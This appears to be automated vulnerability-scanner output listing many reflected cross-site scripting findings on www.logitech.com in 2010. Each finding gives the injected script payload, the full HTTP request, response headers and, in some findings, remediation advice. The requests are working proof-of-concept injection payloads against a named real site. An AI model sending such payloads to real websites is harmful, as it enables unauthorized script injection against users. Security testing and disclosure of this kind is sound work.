<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59cee</script><script>alert(1)</script>16d244f72e7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /59cee</script><script>alert(1)</script>16d244f72e7/notebook-products/webcams HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:11 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc7c0"><script>alert(1)</script>3e4eaf3eb69 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/notebook-productscc7c0"><script>alert(1)</script>3e4eaf3eb69/webcams HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6d09d</script><script>alert(1)</script>b1bf628b04c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/notebook-products6d09d</script><script>alert(1)</script>b1bf628b04c/webcams HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee6a7"><script>alert(1)</script>df9a188cce was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/notebook-products/webcamsee6a7"><script>alert(1)</script>df9a188cce HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:20 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f0b44</script><script>alert(1)</script>b7693f64ac8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/notebook-products/webcamsf0b44</script><script>alert(1)</script>b7693f64ac8 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 275ab</script><script>alert(1)</script>c50e9122360 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /275ab</script><script>alert(1)</script>c50e9122360/press HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e67b0"><script>alert(1)</script>2d7da0cbc08 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-use67b0"><script>alert(1)</script>2d7da0cbc08/press HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30a34"><script>alert(1)</script>4949c773afd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/press30a34"><script>alert(1)</script>4949c773afd HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20e89</script><script>alert(1)</script>d4d53adaa71 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/press20e89</script><script>alert(1)</script>d4d53adaa71 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69770</script><script>alert(1)</script>adf653958b5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /69770</script><script>alert(1)</script>adf653958b5/promotional-items/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e669b"><script>alert(1)</script>98e718c55d9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-use669b"><script>alert(1)</script>98e718c55d9/promotional-items/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19953"><script>alert(1)</script>e1d923f6746 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us/promotional-items19953"><script>alert(1)</script>e1d923f6746/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e61e</script><script>alert(1)</script>32f4a44c4db was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/promotional-items1e61e</script><script>alert(1)</script>32f4a44c4db/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:01 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2e051</script><script>alert(1)</script>47755f2619b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2e051</script><script>alert(1)</script>47755f2619b/promotional-items/devices/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3a584"%3bbd9e7f04bac was submitted in the REST URL parameter 1. This input was echoed as 3a584";bd9e7f04bac in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us3a584"%3bbd9e7f04bac/promotional-items/devices/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Server: Apache AK-control: no-store Date: Fri, 12 Nov 2010 13:01:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60b13"><script>alert(1)</script>fe7d7cc5ae6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us60b13"><script>alert(1)</script>fe7d7cc5ae6/promotional-items/devices/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 508c6"><script>alert(1)</script>4e4d11c5a1c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us/promotional-items508c6"><script>alert(1)</script>4e4d11c5a1c/devices/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ae74</script><script>alert(1)</script>f6e2fb09071 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/promotional-items1ae74</script><script>alert(1)</script>f6e2fb09071/devices/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:00 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99d7f"><script>alert(1)</script>f857921a358 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us/promotional-items/devices99d7f"><script>alert(1)</script>f857921a358/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3c02</script><script>alert(1)</script>bb1f3b3c477 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/promotional-items/devicesc3c02</script><script>alert(1)</script>bb1f3b3c477/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82bae</script><script>alert(1)</script>09db99edeb1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /82bae</script><script>alert(1)</script>09db99edeb1/promotional-items/devices/7619 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:20 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0fff"><script>alert(1)</script>e8b880a5ca6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-usd0fff"><script>alert(1)</script>e8b880a5ca6/promotional-items/devices/7619 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:56:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae3d2"%3b053012e98f2 was submitted in the REST URL parameter 1. This input was echoed as ae3d2";053012e98f2 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-usae3d2"%3b053012e98f2/promotional-items/devices/7619 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:56:54 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91847"><script>alert(1)</script>f7c3b18a337 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/promotional-items91847"><script>alert(1)</script>f7c3b18a337/devices/7619 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b7edb</script><script>alert(1)</script>2c23ebe8a4e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/promotional-itemsb7edb</script><script>alert(1)</script>2c23ebe8a4e/devices/7619 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f0a9a</script><script>alert(1)</script>683aad6d9c9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/promotional-items/devicesf0a9a</script><script>alert(1)</script>683aad6d9c9/7619 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9446b"><script>alert(1)</script>a586d5a54b2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/promotional-items/devices9446b"><script>alert(1)</script>a586d5a54b2/7619 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:32 GMT Connection: close
